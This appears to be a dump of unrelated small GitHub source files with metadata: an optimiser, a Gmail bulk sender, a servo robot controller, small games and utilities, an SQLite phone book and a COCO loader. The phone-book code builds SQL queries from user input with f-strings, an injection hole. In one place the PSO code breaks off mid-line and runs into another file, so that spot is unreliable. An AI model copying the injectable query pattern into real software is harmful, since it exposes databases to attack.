-1\n","repo_name":"kevinliao852/code-problem-solutions","sub_path":"leetcode/python/724.py","file_name":"724.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"20819826556","text":"import random\nfrom TestFunctions import ackley_function\nfrom Visualization import epoch_result_cols\nimport pandas as pd\n\nc1 = 1\nc2 = 2\nw = 0.85\nINIT_FITNESS = -float(\"inf\")\nmm=-1\n\nclass Particle:\n def __init__(self, bounds):\n\n self.position=[] # x y\n self.velocity=[] # x y\n self.best_position=[]\n init_fitness = INIT_FITNESS\n self.fittnes_best_position = init_fitness\n self.fitness_position = init_fitness\n self.DIM = 2 # x and y\n for i in range(self.DIM):\n self.position.append(random.uniform(bounds[i][0], bounds[i][1]))\n self.velocity.append(random.uniform(-1,1))\n \n def evaluate(self,objective_function):\n\n self.fitness_position = objective_function([[self.position[0]], [self.position[1]]]) # get fittnes at acualt particle position\n #if mm == -1:\n if self.fitness_position < mm * self.fittnes_best_position:\n self.best_position = self.position #update particle best\n self.fittnes_best_position = self.fitness_position\n\n def update_velocity(self, global_best_position):\n for i in range(self.DIM):\n r1 = random.random()\n r2 = random.random()\n personal_velocity = PSO.c1 * r1 * (self.best_position[i] - self.position[i])\n swarm_velocity = PSO.c2 * r2 * (global_best_position[i] - self.position[i])\n self.velocity[i] = w * self.velocity[i] + personal_velocity + swarm_velocity\n \n def update_position(self, bounds):\n for i in range(self.DIM):\n self.position[i] = self.position[i]+self.velocity[i]\n #Upperbound check\n if self.position[i]>bounds[i][1]:\n self.position[i]=bounds[i][1]\n if self.position[i] 20480000:\n print(\"File size exceeds 20mb, please choose another file\")\n correct_attachment = False\n else:\n attachment.append(filename)\n correct_attachment = True\n except:\n print(\"File does not exist!, please choose another attachment!\")\n\n choice = input(\"Is there another attachment that you want to select?(Y/n): \")\n if evaluate(choice):\n correct_attachment = False\n else:\n correct_attachment = True\n\n os.chdir(\"../credentials\")\n\n print(\"Loading account info please wait.....\")\n try:\n ezgmail.init()\n except:\n print(\"Unable to initialize account, please check your credentials.json\")\n exit(-1)\n\n print(\"Account is loaded!\")\n\n title = input(\"Please type in the title of email: \")\n data = fd.read()\n\n for row in dict_reader:\n if not len(attachment):\n ezgmail.send(row[\"Email\"], title, data)\n else:\n ezgmail.send(row[\"Email\"], title, data, attachment)\n print(\"Email to\", row[\"ClientName\"], \"sent!\")\n\n usr_input = input(\"ALl email sent, do you want to send another one?(Y/n): \")\n\n if evaluate(usr_input):\n main()\n else:\n print(\"exiting script now, have a nice day :)\")\n\n fd.close()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tasuka98/Automated_EmailSender","sub_path":"src/automate.py","file_name":"automate.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37177942565","text":"from multiprocessing import Process, Pipe, Manager, Value\nfrom Adafruit_PWM_Servo_Driver import PWM\nfrom dataposter import DataPoster\nimport RPi.GPIO as GPIO\nimport datetime, time\nimport pandas as pd\nimport numpy as np\nimport subprocess as sbp\nimport logging\nimport os\nimport glob\nimport json\nimport csv\nimport copy \nimport thread\n\n\n\nclass RobotControl():\n def setServoPulse(self,channel, pulse):\n pulseLength = 1000000 # 1,000,000 us per second\n pulseLength /= 60 # 60 Hz\n pulseLength /= 4096 # 12 bits of resolution\n pulse *= 1000\n pulse /= pulseLength\n self.pwm.setPWM(channel, 0, pulse)\n\n def dataPoster(self, state):\n print('TODO: Flesh this out')\n\n def start(self):\n logging.info('Run started')\n\n# self.dataPoster = DataPoster()\n# self.dataPoster.initialize(self.teachpoints,self.sequences,self.state)\n# self.parent_conn, self.child_conn = Pipe()\n# p = Process(target=self.dataPoster.changeState)\n# p.start()\n\n self.mainMenu()\n\n # p.join()\n\n\n def goToTeachPoint(self,teachpoint,delay=1,steps=25):\n #this simply jerks then does a linear ramp over the move delay. For longer moves, it is best practice to ramp at accel_max, move at vel_max, then decel. The throw of the ROT2U is negligable for this, YMMV.\n incdelay = 1.0*delay/steps\n tp = self.teachpoints[self.teachpoints['Position'] == teachpoint]\n if tp.shape<1:\n logging.info('Teachpoint not found')\n return\n movesarr = np.zeros((6,steps)) \n for channel,col in enumerate(tp.columns[2:]):\n position = tp.loc[tp.index[0],col]\n if ~pd.isnull(position):\n movesarr[channel] = np.linspace(self.servoPositions[channel],position,steps)\n else:\n movesarr[channel] = np.ones(steps) * self.servoPositions[channel] #dont move this servo\n movesarr = np.round(movesarr)\n for x in np.arange(0,steps):\n cur_positions = movesarr[:,x]\n for channel,value in enumerate(cur_positions):\n self.pwm.setPWM(channel,0,int(value))\n self.servoPositions[channel] = int(value)\n time.sleep(incdelay)\n\n def goToServoPositionSmooth(self,channel,position,delay=1,steps=25):\n #this simply jerks then does a linear ramp over the move delay. For longer moves, it is best practice to ramp at accel_max, move at vel_max, then decel. The throw of the ROT2U is negligable for this, YMMV.\n incdelay = 1.0*delay/steps\n start_position = self.servoPositions[channel]\n inc_step = 1.0*(position - start_position)/steps\n new_pos = start_position\n\n while(True):\n arrived = False\n new_pos = int(new_pos + inc_step)\n \n if (start_position > position):\n if (new_pos<=position):\n arrived = True\n new_pos = position\n else:\n if (new_pos >= position):\n arrived = True\n new_pos = position\n self.pwm.setPWM(channel,0,new_pos)\n self.servoPositions[channel] = new_pos\n if arrived:\n break\n print('moved {}, sleeping for {}'.format(new_pos,incdelay))\n time.sleep(incdelay)\n \n \n\n\n self.pwm.setPWM(channel,0,position)\n self.servoPositions[channel] = position #update current log of positions\n\n\n def goToServoPosition(self,channel,position):\n self.pwm.setPWM(channel,0,position)\n self.servoPositions[channel] = position #update current log of positions\n \n def printCurrentServoPositions(self):\n for x,pos in enumerate(self.servoPositions):\n print(str(x)+ \": \" + str(pos))\n self.changeState(0)\n\n\n def goToTeachPointMenu(self):\n while (True):\n print('\\n')\n teachPoint = raw_input(\"Please input a teachpoint to go to. Enter l to list available teachpoints, q to return to the main menu: \")\n if teachPoint == 'l':\n for pos in self.teachpoints['Position'].unique():\n print(pos)\n elif teachPoint == 'q':\n break;\n else:\n self.goToTeachPoint(teachPoint)\n self.changeState(0)\n\n\n def runSequenceMenu(self):\n while (True):\n print('\\n')\n sequence = raw_input(\"Please input a sequence to run. Enter l to list available sequences, q to return to the main menu: \")\n if sequence == 'l':\n for seq in self.sequences['sequence'].unique():\n print(seq)\n elif sequence == 'q':\n break;\n else:\n self.runSequence(sequence)\n self.changeState(0)\n\n # def goToTeachPoint(self,teachpoint,delay=0):\n # tp = self.teachpoints[self.teachpoints['Position'] == teachpoint]\n # if tp.shape<1:\n # logging.info('Teachpoint not found')\n # return\n # for channel,col in enumerate(tp.columns[2:]):\n # position = tp.loc[tp.index[0],col]\n # if ~pd.isnull(position):\n # self.goToServoPosition(int(channel),int(position))\n # if delay>0:\n # time.sleep(delay)\n \n def goToServoPositionMenu(self):\n servoextent = ''\n arrowDelta = 10 #delta to move when using arrow keys\n while (True):\n if servoextent == 'q':\n break;\n servoChannel = raw_input(\"Please input a servo channel (0-5). Enter q to return to the main menu: \")\n if servoChannel == 'q':\n break;\n while(True):\n servoextent = raw_input(\"Please input a servo extent from 0 to 4096, up or down arrows to nudge, or s to switch servo channel, q to return to the main menu\")\n ## TODO: error input handling\n if servoextent == \"s\": \n logging.info('Switching channels')\n break;\n elif servoextent == \"q\":\n logging.info('Return to main menu')\n break;\n elif servoextent == '\\x1b[A': #up\n self.goToServoPosition(int(servoChannel),int(self.servoPositions[int(servoChannel)]+arrowDelta))\n elif servoextent == '\\x1b[B':\n self.goToServoPosition(int(servoChannel),int(self.servoPositions[int(servoChannel)]-arrowDelta))\n else:\n self.goToServoPosition(int(servoChannel), int(servoextent))\n self.changeState(0)\n \n def input_thread(self, a_list):\n raw_input(\"Press enter to stop sequence\")\n a_list.append(True)\n print('Stopping loop after this sequence run completes')\n\n def runSequence(self, sequence):\n try:\n cur_seq = self.sequences[self.sequences['sequence'] == sequence].iloc[0]\n pts = [str(p).strip() for p in cur_seq['teachpoints'].split(',')]\n delays = cur_seq['delays'].split(',')\n except:\n logging.info('No sequence ')\n if len(delays) != len(pts):\n logging.info('Delays array is a different length than teachpoints. Generating delays')\n delays = np.ones(len(pts))\n\n print('Running sequence')\n\n a_list = []\n if cur_seq['loop']:\n thread.start_new_thread(self.input_thread, (a_list,))\n while not a_list:\n for x,pt in enumerate(pts):\n #print(pt)\n self.goToTeachPoint(pt,int(delays[x]))\n if not cur_seq['loop']:\n break\n\n def shutdown(self):\n logging.info('Shutting down system')\n self.goToTeachPoint('safety')\n time.sleep(0.5)\n self.goToTeachPoint('rest')\n\n def testSequence(self):\n while(True):\n self.goToTeachPoint('safety')\n time.sleep(1)\n self.goToTeachPoint('left_pick_hover')\n time.sleep(1)\n self.goToTeachPoint('left_pick')\n time.sleep(1)\n self.goToTeachPoint('grip_closed')\n time.sleep(1)\n self.goToTeachPoint('left_pick_hover')\n time.sleep(1)\n self.goToTeachPoint('safety')\n time.sleep(1)\n self.goToTeachPoint('right_pick_hover')\n time.sleep(1)\n self.goToTeachPoint('grip_open')\n time.sleep(1)\n self.goToTeachPoint('right_pick')\n time.sleep(1)\n self.goToTeachPoint('grip_closed')\n time.sleep(1)\n self.goToTeachPoint('right_pick_hover')\n time.sleep(1)\n\n def changeState(self, newState):\n try:\n states = {\n 0 : 'mainMenu',\n 1 : 'runSequence',\n 2 : 'goToTeachPoint',\n 3 : 'goToServoPosition',\n 4 : 'printCurrentServoPositions',\n 5 : 'shutdown',\n } \n self.state['state'] = states[newState]\n\n options = {\n 0 : self.mainMenu,\n 1 : self.runSequenceMenu,\n 2 : self.goToTeachPointMenu,\n 3 : self.goToServoPositionMenu,\n 4 : self.printCurrentServoPositions,\n 5 : self.shutdown,\n } \n options[newState]()\n except:\n print('Invalid option, returning to main menu')\n self.changeState(0)\n\n\n\n def mainMenu(self):\n print('\\n\\n\\n')\n print('Main Menu:____________________________________________________________________________________')\n print('Please enter a number to select one of the following options:')\n print('1. Run Sequence')\n print('2. Go To TeachPoint')\n print('3. Go To Servo Position')\n print('4. List Current Servo Positions')\n print('5. Shutdown')\n newState = raw_input(\"Please input a number: \")\n self.changeState(int(newState))\n\n def __init__(self):\n number_of_servos = 6\n\n installdir = os.path.dirname(__file__)\n\n logging.basicConfig(filename=installdir + '/robotcontrol.log',level=logging.INFO)\n self.teachpoints = pd.read_csv(installdir + '/Teachpoints.csv')\n self.sequences = pd.read_csv(installdir + '/Sequences.csv',delimiter=';')\n\n self.pwm = PWM(0x40)\n self.pwm.setPWMFreq(60) # Set frequency to 60 Hz\n self.servoPositions = self.teachpoints.loc[self.teachpoints['Position']=='rest'].iloc[:,2:].values[0]\n self.goToTeachPoint('safety')\n self.state = Manager().dict() #multiprocessing thread safe value passing\n self.state['state'] = 'Initializing'\n\n","repo_name":"mechiris/RobotControl","sub_path":"robotcontrol/robotcontrol.py","file_name":"robotcontrol.py","file_ext":"py","file_size_in_byte":10841,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"32479472957","text":"def strip_comments(string, markers):\n new_string = ''\n i = 0\n while i < len(string):\n if string[i] in markers:\n while True:\n i += 1\n \n if i == len(string):\n break\n if string[i] == '\\n':\n break\n else:\n new_string += string[i]\n if i + 1 < len(string) and string[i + 1] in markers:\n new_string = new_string.rstrip()\n i += 1\n \n return new_string\n\n\n\n\nprint(strip_comments('apples, pears # and bananas\\ngrapes\\nbananas !apples', ['#', '!']))\n'''\napples, pears\ngrapes\nbananas\n---------------------------------------\n[or 'apples, pears\\ngrapes\\nbananas']\n'''\n\nprint(strip_comments(' a #b\\n\\nc\\nd\\n $e f g', ['#', '$']))\n'''\n a\n\nc\nd\n---------------------------\n[or ' a\\n\\nc\\nd']\n'''","repo_name":"kwesiObuobi/code-and-code","sub_path":"codewars/strip_comments/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15038505455","text":"def cifrado():\r\n cadena = input(\"Ingresa tu mensaje: \")\r\n lista=[]\r\n cad = ''\r\n for i in cadena:\r\n lista.append(ord(i))\r\n i= i.upper()\r\n j = ord(i) + 2\r\n if j > ord('Z'):\r\n j = ord('A')\r\n cad += chr(j)\r\n print('el mensaje en letras es: ',cad, 'el mensaje e numeros es: ',lista)\r\ncifrado()\r\n","repo_name":"paulabohorquez/miscelanea1-2560664-A","sub_path":"cadenasmetodos/cifrado.py","file_name":"cifrado.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12356529771","text":"import requests\r\nimport json\r\n\r\n#rank接口:获取排行\r\n\r\ndef getRank():\r\n url = \"http://47.102.118.1:8089/api/rank\"\r\n data = requests.get(url)\r\n result = data.json()\r\n print(result)\r\n\r\nif __name__ == \"__main__\":\r\n getRank()","repo_name":"Bergscl/doubleCode","sub_path":"AI/getRank.py","file_name":"getRank.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25185459837","text":"#!/usr/bin/env python\n\"\"\"\n__author__ = Shannon B. , 10/19/16\n\"\"\"\n\nimport os\nimport sys\nfrom os import path\nimport urllib.request as req\nimport bs4\nimport datetime\nimport statistics\n\n__version__ = '0.1.0'\n\n'''\n# Example date range: 8/19/16 thru 10/19/16\n# Example BASEURL: https://www.wunderground.com/history/airport/KSZT/\n\n# APPENDED QUERY:\n\n# 2016/8/19/CustomHistory.html?dayend=19&monthend=10&yearend=2016&req_city=&req_state=&req_statename=&reqdb.zip=&reqdb.magic=&reqdb.wmo=\n\n# Table format: Title: Weather History & Observations\n# Year| Temp. (deg F)| Dew Point (deg F)| Humidity (%)| Sea Level Press. (in)| Visibility (mi)| Wind (mph)| Precip. (in)\n# Month | high, avg, low | high, avg, low | etc | etc\n\n# Data to pull: Temperature , Wind Speed, Barometric Pressure (aka Sea Level Press.) -> take avgs. although not ideal\n'''\n\nBASE_URL = 'https://www.wunderground.com/history/airport/KSZT/'\n\n\ndef get_page(url):\n\n page = req.urlopen(url)\n return page\n\n\ndef get_soup(page):\n\n soup = bs4.BeautifulSoup(page, \"lxml\")\n\n return soup\n\n\ndef construct_date_range_query(start_date, end_date):\n \"\"\"\n\n :param start_date: mm/dd/yyyy\n :param end_date: may be string or tup? probably dumb but handling either...\n :return: query_string to append BASE_URL\n \"\"\"\n\n start_chunks = start_date.split('/')\n\n if '/' in end_date:\n end_chunks = end_date.split('/')\n else:\n end_chunks = (end_date[0], end_date[2], end_date[1])\n\n start_year, start_month, start_day = start_chunks\n end_month, end_day, end_year = end_chunks\n\n query_to_append = r'{}/{}/{}/CustomHistory.html?dayend={}&monthend={}&yearend={}&req_city=&req_state=' \\\n '&req_statename=&reqdb.zip=&reqdb.magic=&reqdb.wmo='.format(\n start_year, start_month, start_day, end_day, end_month, end_year)\n\n return BASE_URL + query_to_append\n\n\ndef get_date_range_from_user(*date_range):\n\n if not date_range:\n\n end_date = input('Choose an end date to search, use the format yyyy/mm/dd')\n\n else:\n\n now = datetime.datetime.now()\n\n end_year = now.year\n end_month = now.month\n end_day = now.day\n\n end_date = (end_year, end_month, end_day)\n\n start_date = input(\"Choose an start date in the format yyyy/mm/dd\")\n\n return start_date, end_date\n\n\ndef main():\n\n date_tup = get_date_range_from_user('2016/10/2')\n\n query_string = construct_date_range_query(*date_tup)\n\n page_soup = get_soup(query_string)\n\n print(page_soup, end=' ')\n\nif __name__ == '__main__':\n main()\n","repo_name":"shandozer/code_clinic","sub_path":"lake_pend_oreille/stats_gathering_oreille.py","file_name":"stats_gathering_oreille.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42388598946","text":"# https://habr.com/ru/post/321510/\n\nimport sqlite3\n\n\ndef get_contacts(cursor):\n '''показать все контакты'''\n cursor.execute(\"select * from phone\")\n results = cursor.fetchall()\n return results\n\n\ndef get_contact(item, cursor):\n '''поиск записи'''\n cursor.execute(f\"select * from phone where surname like '%{item}%'\"\n f\"or name like '%{item}%'\")\n results = cursor.fetchall()\n if results:\n return results\n return 'Контакт не найден'\n\n\ndef add_contact(data, conn, cursor):\n '''добавить контакт'''\n name, surname, telephone = data\n cursor.execute(\n f\"insert into phone (name, surname, telephone, description) \"\n f\"values ('{name}', '{surname}', {telephone}, '')\")\n conn.commit()\n\n\ndef delete(id, conn, cursor):\n '''Удалить контакт'''\n try:\n cursor.execute(\n f\"delete from phone where id={id}\"\n )\n conn.commit()\n return 'Контакт был успешно удален'\n except:\n return 'Контакт не найден. Попробуйте еще раз'\n\n\n","repo_name":"Andrey30011979/HelloPython","sub_path":"Seminar9/HomeWork9/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74314417446","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nDescription : Test various binarization for computing community degree\n\nAuthor: Béatrice Désy\n\nDate : 03/05/2022\n\"\"\"\n\n\nimport numpy as np\nimport json\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import quad\n\nmatplotlib.rc('text', usetex=True)\nmatplotlib.rc('font', size=10)\n\ndef get_dict_key(D, dd, nc, beta, f):\n return 'S{}-'.format(D)+dd+'-{}coms-{}beta-{:.2f}sigmam'.format(nc, beta, f)\n\ndef retrieve_data(data_dict, D, dd, nc, beta, frac_sigma_axis, bins):\n y = []\n for f in frac_sigma_axis:\n key = get_dict_key(D, dd, nc, beta, f)+'-degrees-'+bins\n data = np.array(data_dict[key])\n y.append(data)\n y_data = np.array(y)\n if False:#bins=='backbone':\n y = np.mean(np.max(y_data, axis=2), axis=1)\n err = np.std(np.max(y_data, axis=2), axis=1)\n else:\n y = np.mean(np.mean(y_data, axis=2), axis=1)\n err = np.std(np.mean(y_data, axis=2), axis=1)\n return y, err\n\ndef measure_community_degrees_gthreshold(matrices_list, t):\n data = []\n for m in matrices_list:\n m = np.array(m)\n binary_mat = np.where(m>t, 1, 0)\n degrees = list(np.sum(binary_mat, axis=0).astype(float))\n data.append(degrees)\n return data\n\ndef measure_community_degrees_proportional(matrices_list):\n pass\n\ndef measure_community_degrees_backbone(matrices_list, alpha, show=False):\n data = []\n for m in matrices_list:\n mat = 2*np.array(m)/np.sum(m)\n binary_mat = binarize_using_backbone_method(mat, alpha)\n degrees = list(np.sum(binary_mat, axis=0).astype(float))\n data.append(degrees)\n if show:\n plt.imshow(binary_mat)\n plt.colorbar\n plt.show()\n return data\n\ndef binarize_using_backbone_method(m, alpha):\n n = m.shape[0]\n binary_mat = np.zeros(m.shape)\n for i in range(n):\n for j in range(i):\n p_ij = m[i,j] / np.sum(m[i, :])\n binary_mat[i,j] = int((1-p_ij)**(n-2) < alpha)\n out = binary_mat + binary_mat.T\n assert np.max(out)<1.1, 'max is greater than 1'\n return out\n\ndd='pwl'\nfrac_sigma_axis = np.linspace(0.05, 0.95, 30)\nbeta_r = 3.5\nnc_list = [5,15,25]\n\nt = 10\n\ncompute = True\nif compute:\n with open('data/experiment_entropy_pwl_deg4_blockmatrices.json', 'r') as read_file:\n matrices_dict = json.load(read_file)\n with open('data/experiment_entropy_pwl_deg4.json', 'r') as read_file:\n initial_data_dict = json.load(read_file)\n\n \n res = {}\n for D in [1,2]:\n beta = beta_r*D\n for nc in nc_list:\n for f in frac_sigma_axis:\n key = get_dict_key(D, dd, nc, beta, f)\n dist_gthreshold = measure_community_degrees_gthreshold(matrices_dict[key], t)\n #print(key)\n dist_backbone = measure_community_degrees_backbone(matrices_dict[key], 0.2, show=False)\n key+='-degrees'\n dist_first = initial_data_dict[key]\n res[key+'-first'] = dist_first\n res[key+'-gthreshold'+str(int(t))] = dist_gthreshold\n res[key+'-backbone'] = dist_backbone\n \n #with open('data/community_degrees_various_binarizations.json', 'w') as write_file:\n # json.dump(res, write_file, indent=4)\n\nelse:\n with open('data/community_degrees_various_binarizations.json', 'r') as read_file:\n data_dict = json.load(read_file)\n\ncmap = matplotlib.cm.get_cmap('viridis')\ncolors = [cmap(0.), cmap(2.2/5)]\nformats = [':', '--', '-']\nbidon = np.linspace(100, 110, 1000)\n\nsb = [121, 122]\nfig, axes = plt.subplots(1, 2, figsize=(3.4, 3.), sharey=True)\ni=0\nfor bins in ['gthreshold'+str(int(t)), 'backbone']:\n ax = axes[i]\n for c in range(len(nc_list)):\n nc = nc_list[c]\n ax.plot(bidon, np.ones(bidon.shape), \n formats[c], c='k', alpha=0.5,\n label=r'$n = {}$'.format(nc))\n for D in [1,2]:\n beta = beta_r*D\n y, err = retrieve_data(res, D, dd, nc, beta, frac_sigma_axis, bins)\n\n if nc==25:\n lab = r'$D = {}$'.format(D)\n else:\n lab=None\n\n ax.plot(frac_sigma_axis, y, linestyle=formats[c], color=colors[D-1], \n label=lab)\n ax.fill_between(frac_sigma_axis, y-err, y+err, \n alpha=0.3, color=colors[D-1], linewidth=0.0)\n ax.set_xlabel(r'$\\sigma$')\n ax.set_xlim(0.05, 0.95)\n i+=1\n\naxes[0].set_ylabel(r'$\\langle k\\rangle$')\naxes[0].legend(loc=(0.053, 0.532), frameon=False)\nplt.ylim(0,7.5)\nplt.tight_layout()\naxes[0].set_rasterized(True)\naxes[1].set_rasterized(True)\naxes[0].spines['top'].set_visible(False)\naxes[0].spines['right'].set_visible(False)\naxes[1].spines['top'].set_visible(False)\naxes[1].spines['right'].set_visible(False)\nplt.savefig('binarization.eps', dpi=600, format='eps')\nplt.show()\n","repo_name":"bdesy/communities_modelSd","sub_path":"scripts/figures/fig9_other_binarization.py","file_name":"fig9_other_binarization.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2682256872","text":"#!/usr/bin/python3\nimport random\nnumber = random.randint(-10000, 10000)\ndig = number % 10\nif number < 0 and dig != 0:\n neg = number * -1\n dig = neg % 10\n if dig != 0:\n dig = dig * -1\nelse:\n dig = number % 10\nif dig > 5:\n print(\"Last digit of\" \" {:d}\"\n .format(number) + \" is\" + \" {:d}\"\n .format(dig) + \" and is greater than 5\")\nelif dig < 6 and dig != 0:\n print(\"Last digit of\" \" {:d}\".format(number) + \" is\" + \" {:d}\"\n .format(dig) + \" and is less than 6 and not 0\")\nelse:\n print(\"Last digit of\" + \" {:d}\"\n .format(number) + \" is\" + \" {:d}\".format(dig) + \" and is 0\")\n","repo_name":"angelofgrace/holbertonschool-higher_level_programming","sub_path":"0x01-python-if_else_loops_functions/1-last_digit.py","file_name":"1-last_digit.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14594424226","text":"\"\"\"\r\nauthor: Lavi Jacob Landa\r\ndate: 3/1/2022\r\nexplain: A simple Bulls and Cows game!\r\n\"\"\"\r\nimport os\r\nimport random\r\n\r\n\r\ndef create_code(colors: list) -> list:\r\n code = []\r\n for i in range(5, 1, -1):\r\n number = random.randint(0, i)\r\n code.append(colors[number])\r\n colors.remove(colors[number])\r\n return code\r\n\r\n\r\ndef get_player_input(colors: list) -> str:\r\n invalid = False\r\n while not invalid:\r\n entered = input(\"Enter 4 different colors r/g/b/y/o/c (for example\" +\r\n \"rgby): \")\r\n if len(entered) != 4:\r\n print(\"You need to enter 4 colors!\")\r\n invalid = True\r\n else:\r\n for i in range(4):\r\n if not invalid:\r\n if entered.count(entered[i]) != 1:\r\n invalid = True\r\n if not invalid:\r\n for h in entered:\r\n if not invalid:\r\n if h not in colors:\r\n print(f\"You need to enter r/g/b/y/o/c not {h}\")\r\n invalid = True\r\n else:\r\n print(\"You need to enter different colors!\")\r\n if not invalid:\r\n return entered\r\n invalid = False\r\n\r\n\r\ndef show_board(guessed: list, results: list) -> None:\r\n os.system('cls' if os.name == 'nt' else 'clear')\r\n output = \"\"\r\n for i in range(len(guessed)):\r\n if i < len(results)//2:\r\n output += guessed[i] + \" - \" +\\\r\n f\"{results[i*2-1]} whites and {results[i*2]} blacks\\n\"\r\n print(output)\r\n\r\n\r\ndef start() -> None:\r\n guessed = []\r\n results = []\r\n colors = (\r\n 'r',\r\n 'g',\r\n 'b',\r\n 'y',\r\n 'o',\r\n 'c'\r\n )\r\n code = create_code(list(colors))\r\n place, color, winner = 0, 0, False\r\n for i in range(10):\r\n guessed.append(get_player_input(list(colors)))\r\n for h in range(4):\r\n if guessed[i][h] in code:\r\n if guessed[i][h] == code[h]:\r\n place = place + 1\r\n else:\r\n color = color + 1\r\n if place == 4:\r\n winner = True\r\n break\r\n else:\r\n results.append(place)\r\n results.append(color)\r\n show_board(guessed, results)\r\n place, color = 0, 0\r\n\r\n if winner:\r\n print(f\" YOU WIN!\\nYou got it right in {i+1} moves\")\r\n else:\r\n print(\"You didn't win, try next time!\\nThe answer was \" +\r\n f\"{code[0] + code[1] + code[2] + code[3]}\")\r\n\r\n\r\nif __name__ == '__main__':\r\n start()\r\n","repo_name":"pookmaster21/Classroom","sub_path":"py/Bulls_and_Cows.py","file_name":"Bulls_and_Cows.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17171277335","text":"from django.contrib import admin\n\nfrom support.models import Inquiry, Answer\n\n# Register your models here.\n\n# admin.site.register(Inquiry)\n# admin.site.register(Answer)\n\nclass AnswerInline(admin.TabularInline):\n model = Answer\n min_num = 1\n verbose_name=\"설문 질문 항목\"\n\n\n@admin.register(Inquiry)\nclass InquiryModelAdmin(admin.ModelAdmin):\n list_display = ('title','category','created_by_id','created_at')\n search_fields = ('title', 'email', 'phone')\n search_help_text = '[제목, 이메일, 전화번호] 항목으로 검색 가능합니다'\n inlines = [AnswerInline]","repo_name":"Django-Mission/django_mission_03-KooHyunJung","sub_path":"support/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13514448340","text":"import os\nimport torch\nfrom PIL import Image\nfrom torch.utils.data.dataset import Dataset\nimport pycocotools.coco as coco\nfrom torchvision import transforms\nimport numpy as np\n\nclass cocoDataset(Dataset):\n def __init__(self, coco_folder, mode):\n super(cocoDataset, self).__init__()\n self.coco_folder = coco_folder\n self.mode = mode # 'train' or 'eval'\n self.split = 'train2017' if self.mode == 'train' else 'val2017'\n\n self.image_folder = os.path.join(self.coco_folder, 'images', self.split)\n self.annotation_folder = os.path.join(self.coco_folder, 'annotations')\n self.annotation_path = os.path.join(self.annotation_folder, f'instances_{self.split}.json')\n\n self.transform = transforms.Compose([\n transforms.ToTensor(),\n ])\n\n self.max_objs = 128\n self.class_name = [\n '__background__', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',\n 'bus', 'train', 'truck', 'boat', 'traffic light', 'fire hydrant',\n 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse',\n 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe', 'backpack',\n 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee', 'skis',\n 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove',\n 'skateboard', 'surfboard', 'tennis racket', 'bottle', 'wine glass',\n 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple', 'sandwich',\n 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake',\n 'chair', 'couch', 'potted plant', 'bed', 'dining table', 'toilet', 'tv',\n 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',\n 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase',\n 'scissors', 'teddy bear', 'hair drier', 'toothbrush']\n\n self._valid_ids = [\n 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, \n 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, \n 24, 25, 27, 28, 31, 32, 33, 34, 35, 36, \n 37, 38, 39, 40, 41, 42, 43, 44, 46, 47, \n 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, \n 58, 59, 60, 61, 62, 63, 64, 65, 67, 70, \n 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, \n 82, 84, 85, 86, 87, 88, 89, 90]\n\n print('==> initializing coco {} data.'.format(self.split))\n self.coco = coco.COCO(self.annotation_path)\n self.images = self.coco.getImgIds()\n self.num_samples = len(self.images)\n\n print('Loaded {} {} samples'.format(self.split, self.num_samples))\n \n def __len__(self):\n return self.num_samples\n \n def __getitem__(self, index):\n img_id = self.images[index]\n file_name = self.coco.loadImgs(ids=[img_id])[0]['file_name']\n img_path = os.path.join(self.image_folder, file_name)\n ann_ids = self.coco.getAnnIds(imgIds=[img_id])\n anns = self.coco.loadAnns(ids=ann_ids)\n num_objs = min(len(anns), self.max_objs)\n \n image = Image.open(img_path).convert(\"RGB\")\n image = self.transform(image)\n\n boxes = [] \n for i in range(num_objs):\n ann = anns[i]\n box = ann['bbox'] # x1, y1, w, h\n if box[2] <= 0 or box[3] <= 0 : \n continue \n box = np.array([box[0], box[1], box[0] + box[2], box[1] + box[3]],\n dtype=np.float32)\n obj_index = ann['category_id']\n \n boxes.append([obj_index, box])\n\n return image, boxes, 